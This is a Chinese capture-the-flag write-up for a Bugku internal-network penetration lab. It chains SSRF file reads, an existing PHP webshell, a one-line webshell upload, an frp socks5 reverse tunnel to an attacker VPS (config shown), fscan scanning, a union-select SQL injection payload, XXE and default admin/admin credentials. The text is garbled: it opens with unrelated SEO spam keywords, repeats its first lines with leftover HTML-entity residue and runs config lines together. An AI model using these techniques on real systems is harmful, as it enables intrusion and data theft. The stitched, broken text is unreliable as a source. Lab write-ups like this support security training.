佛山微网站建设报价,自己建网站收费吗,个人做网站的时代已经过去,锡林郭勒盟建设工程造价信息管理网站前言
本题一共八个flag#xff0c;主要是为了练习内网渗透的思路。
解题思路
首先给了一个站长之家-模拟蜘蛛爬取#xff0c;这个以前见到过#xff0c;存在sstf漏洞#xff0c;直接读取文件。
file:///flag既然是要内网渗透#xff0c;那肯定要看/etc/hosts。
file:…前言
本题一共八个flag主要是为了练习内网渗透的思路。
解题思路
首先给了一个站长之家-模拟蜘蛛爬取这个以前见到过存在sstf漏洞直接读取文件。
file:///flag既然是要内网渗透那肯定要看/etc/hosts。
file:///etc/hosts爆破192.168.0.2端口发现存在192.168.0.10是一个被黑的页面。 尝试访问shell文件发现shell.php可命令执行。 想传入一句话木马连接蚁剑首先需要内网穿透开启代理利用wget将所需要的文件下载上去。 然后启动frpc服务需要先在vps上启动frps代理连接后即可传入一句话木马来连接蚁剑。
命令
vps ./frps -c frps.ini 先运行
靶机 ./frpc -c frpc.inifrpc.ini配置文内容
[common]
server_addr vps
server_port 7000[socks5]
type tcp
remote_port 7001
plugin socks5在html下和根目录下各有一个flag。
然后上传fscan扫描10.10.0.0/24和192.168.0.0/24。
192.168.0.138为分数查询系统存在sql注入。
4 union select 1,2,3,(select*fromflag)#在192.168.0.250中存在登录框登录成功后并无回显最后xxe尝试成功在html下和根目录下各有两个flag。 又在10.10.0.22中发现bugku管理页面存在admin.php后台。
admin admin登陆成功。
发现有文件上传功能且没有过滤可直接传入一句话木马在html目录和根目录下各有两个flag。 因为环境已经到时不想再用20金币开启所以后边写的较简略。
